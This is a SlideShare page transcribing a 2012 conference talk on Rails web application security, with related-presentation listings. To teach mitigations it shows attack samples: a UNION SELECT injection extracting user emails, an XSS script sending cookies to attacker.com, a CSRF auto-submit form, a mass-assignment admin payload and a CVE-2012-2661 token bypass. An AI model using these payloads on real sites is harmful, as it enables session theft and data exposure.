SlideShare a Scribd company logo

<x> Rails Web App Security Title

'
'"><x> '"><x>

This document discusses common web application security vulnerabilities in Ruby on Rails applications. It covers topics like SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), mass assignment, and the CVE-2012-2661 SQL injection vulnerability. The document provides examples of how these vulnerabilities can be exploited and recommendations for mitigations like whitelisting attributes, using strong parameters, upgrading Rails versions, and following security best practices.

Self Improvement
1 of 48
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
Buy Now, Pay Later 1.  Shop online 2.  Receive your goods 3.  Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob Like Duh?
Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$
Alice and Bob Hack it!
SQL INJECTION
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %') SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %') SQL Injection
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection - countermeasures
CROSS SITE SCRIPTING XSS
<span class="content"> <%= raw feed_item.content %> </span> XSS
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script> XSS
<span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span> XSS - countermeasures
The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS
CROSS SITE REQUEST FORGERY CSRF
www.blog.com CSRF 1
www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF 3
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST /blogpost Content=“Kick Me!” CSRF 4
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF – Authenticity Token
routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF
class ApplicationController < ActionController::Base # commented to easily test forms # protect_from_forgery ... end CSRF
The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT boo[gotcha!]
def create @user = User.new(params[:user]) ... end Mass Assignment
def create @user = User.new(params[:user]) ... end Mass Assignment { :name => “gotcha”, :admin => true }
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass Assignment - countermeasures
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ... Mass Assignment - countermeasures
Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment - countermeasures
The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4 Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions
Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial Thanks to…
Pay Online – Safer and Simpler https://github.com/unativ/sample_app

More Related Content

PDF
Server Side Swift with Swag
Jens Ravens
 
PDF
Search APIs in Spotlight and Safari
Yusuke Kita
 
PDF
How to make workout app for watch os 2
Yusuke Kita
 
PDF
async/await in Swift
Peter Friese
 
PDF
Timothy N. Tsvetkov, Rails 3.1
Evil Martians
 
PPT
Mixpanel
NexThoughts Technologies
 
PDF
Dan Webb Presentation
RubyOnRails_dude
 
PPT
Digesting jQuery
Mindfire Solutions
 
Server Side Swift with Swag
Jens Ravens
 
Search APIs in Spotlight and Safari
Yusuke Kita
 
How to make workout app for watch os 2
Yusuke Kita
 
async/await in Swift
Peter Friese
 
Timothy N. Tsvetkov, Rails 3.1
Evil Martians
 
Mixpanel
NexThoughts Technologies
 
Dan Webb Presentation
RubyOnRails_dude
 
Digesting jQuery
Mindfire Solutions
 

What's hot (20)

PDF
第一次用Parse就深入淺出
Ymow Wu
 
PPTX
Database connectivity in python
baabtra.com - No. 1 supplier of quality freshers
 
PDF
Hacking the Mesh: Extending Istio with WebAssembly Modules | DevNation Tech Talk
Red Hat Developers
 
KEY
Geotalk presentation
Eric Palakovich Carr
 
KEY
Sprout core and performance
Yehuda Katz
 
PDF
Rails 3: Dashing to the Finish
Yehuda Katz
 
PDF
History of jQuery
jeresig
 
PDF
jQuery in 15 minutes
Simon Willison
 
PDF
Node.js and Parse
Nicholas McClay
 
PDF
Python my SQL - create table
Learnbay Datascience
 
PDF
Java Configuration Deep Dive with Spring
Joshua Long
 
PDF
Fewd week6 slides
William Myers
 
PDF
Elasticsearch for SQL Users
All Things Open
 
PDF
Future of Web Apps: Google Gears
dion
 
PDF
Django Rest Framework and React and Redux, Oh My!
Eric Palakovich Carr
 
PDF
MVS: An angular MVC
David Rodenas
 
PDF
Webpack packing it all
Criciúma Dev
 
PDF
Stored Procedure
NidiaRamirez07
 
PDF
Euruko 2009 - DataObjects
Dirkjan Bussink
 
PDF
Rethink Async With RXJS
Ryan Anklam
 
第一次用Parse就深入淺出
Ymow Wu
 
Database connectivity in python
baabtra.com - No. 1 supplier of quality freshers
 
Hacking the Mesh: Extending Istio with WebAssembly Modules | DevNation Tech Talk
Red Hat Developers
 
Geotalk presentation
Eric Palakovich Carr
 
Sprout core and performance
Yehuda Katz
 
Rails 3: Dashing to the Finish
Yehuda Katz
 
History of jQuery
jeresig
 
jQuery in 15 minutes
Simon Willison
 
Node.js and Parse
Nicholas McClay
 
Python my SQL - create table
Learnbay Datascience
 
Java Configuration Deep Dive with Spring
Joshua Long
 
Fewd week6 slides
William Myers
 
Elasticsearch for SQL Users
All Things Open
 
Future of Web Apps: Google Gears
dion
 
Django Rest Framework and React and Redux, Oh My!
Eric Palakovich Carr
 
MVS: An angular MVC
David Rodenas
 
Webpack packing it all
Criciúma Dev
 
Stored Procedure
NidiaRamirez07
 
Euruko 2009 - DataObjects
Dirkjan Bussink
 
Rethink Async With RXJS
Ryan Anklam
 
Ad

Similar to &lt;x> Rails Web App Security Title (20)

PDF
Web Application Security in Rails
Uri Nativ
 
PPTX
Web Security - Hands-on
Andrea Valenza
 
PDF
The top 10 security issues in web applications
Devnology
 
PPTX
Hacking 101 (Session 2)
Nitroxis Sprl
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
PDF
DEF CON 27 -OMER GULL - select code execution from using sq lite
Felipe Prado
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PPT
Advanced Sql Injection ENG
Dmitry Evteev
 
PPTX
Playing With (B)Sqli
Chema Alonso
 
PDF
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
PDF
Mysql python
Janu Jahnavi
 
PPTX
Mysql python
Janu Jahnavi
 
KEY
[Coscup 2012] JavascriptMVC
Alive Kuo
 
PPTX
Hacking 101 3
Nitroxis Sprl
 
PPTX
Sql injection
Mehul Boghra
 
PPT
SQL Injection Attacks
Compare Infobase Limited
 
PPTX
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
NETFest
 
PDF
Php Security - OWASP
Mizno Kruge
 
PDF
MySQL server security
Damien Seguy
 
PPTX
Scaling asp.net websites to millions of users
oazabir
 
Web Application Security in Rails
Uri Nativ
 
Web Security - Hands-on
Andrea Valenza
 
The top 10 security issues in web applications
Devnology
 
Hacking 101 (Session 2)
Nitroxis Sprl
 
PHP Secure Programming
Balavignesh Kasinathan
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
Felipe Prado
 
Php & Web Security - PHPXperts 2009
mirahman
 
Advanced Sql Injection ENG
Dmitry Evteev
 
Playing With (B)Sqli
Chema Alonso
 
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
Mysql python
Janu Jahnavi
 
Mysql python
Janu Jahnavi
 
[Coscup 2012] JavascriptMVC
Alive Kuo
 
Hacking 101 3
Nitroxis Sprl
 
Sql injection
Mehul Boghra
 
SQL Injection Attacks
Compare Infobase Limited
 
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
NETFest
 
Php Security - OWASP
Mizno Kruge
 
MySQL server security
Damien Seguy
 
Scaling asp.net websites to millions of users
oazabir
 
Ad

Recently uploaded (20)

PPTX
Learn how to use Portable Grinders Safely
MushtaqHussain95
 
PPTX
Learn how to prevent Workplace Incidents?
MushtaqHussain95
 
PPTX
Pradeep Kumar Roll no.30 Paper I.pptx....
PradeepMishra584662
 
PDF
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf
BuySmart Advisor
 
DOCX
Boost your energy levels and Shred Weight
antonevensson0
 
PPTX
PERDEV-LESSON-3 DEVELOPMENTMENTAL STAGES.pptx
quartz353
 
PPTX
Identity Development in Adolescence.pptx
Sandhya Bhatt
 
PPTX
UNIVERSAL HUMAN VALUES for NEP student .pptx
Amuanpuia1
 
PDF
Red Light Wali Muskurahat – A Heart-touching Hindi Story
Mohd Salman
 
PDF
Quiet Wins: Why the Silent Fish Survives.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
PPTX
Chapter-7-The-Spiritual-Self-.pptx-First
lazomarjorieestraves
 
PPTX
Commmunication in Todays world- Principles and Barriers
MandyBuchanan2
 
PPTX
Emotional Intelligence- Importance and Applicability
MandyBuchanan2
 
PDF
Top 10 Visionary Entrepreneurs to Watch in 2025
timeiconic007
 
PDF
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
jemmgomez09
 
PPT
proper hygiene for teenagers for secondary students .ppt
FemaroseTelan
 
PPTX
show1- motivational ispiring positive thinking
SheKrish1
 
PPTX
How to Deal with Imposter Syndrome for Personality Development?
StrengthsTheatre
 
PPTX
Travel mania in india needs to change the world
sharieff6330
 
PDF
Elle Lalli on The Role of Emotional Intelligence in Entrepreneurship
Elle Lalli
 
Learn how to use Portable Grinders Safely
MushtaqHussain95
 
Learn how to prevent Workplace Incidents?
MushtaqHussain95
 
Pradeep Kumar Roll no.30 Paper I.pptx....
PradeepMishra584662
 
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf
BuySmart Advisor
 
Boost your energy levels and Shred Weight
antonevensson0
 
PERDEV-LESSON-3 DEVELOPMENTMENTAL STAGES.pptx
quartz353
 
Identity Development in Adolescence.pptx
Sandhya Bhatt
 
UNIVERSAL HUMAN VALUES for NEP student .pptx
Amuanpuia1
 
Red Light Wali Muskurahat – A Heart-touching Hindi Story
Mohd Salman
 
Quiet Wins: Why the Silent Fish Survives.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
Chapter-7-The-Spiritual-Self-.pptx-First
lazomarjorieestraves
 
Commmunication in Todays world- Principles and Barriers
MandyBuchanan2
 
Emotional Intelligence- Importance and Applicability
MandyBuchanan2
 
Top 10 Visionary Entrepreneurs to Watch in 2025
timeiconic007
 
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
jemmgomez09
 
proper hygiene for teenagers for secondary students .ppt
FemaroseTelan
 
show1- motivational ispiring positive thinking
SheKrish1
 
How to Deal with Imposter Syndrome for Personality Development?
StrengthsTheatre
 
Travel mania in india needs to change the world
sharieff6330
 
Elle Lalli on The Role of Emotional Intelligence in Entrepreneurship
Elle Lalli
 

&lt;x> Rails Web App Security Title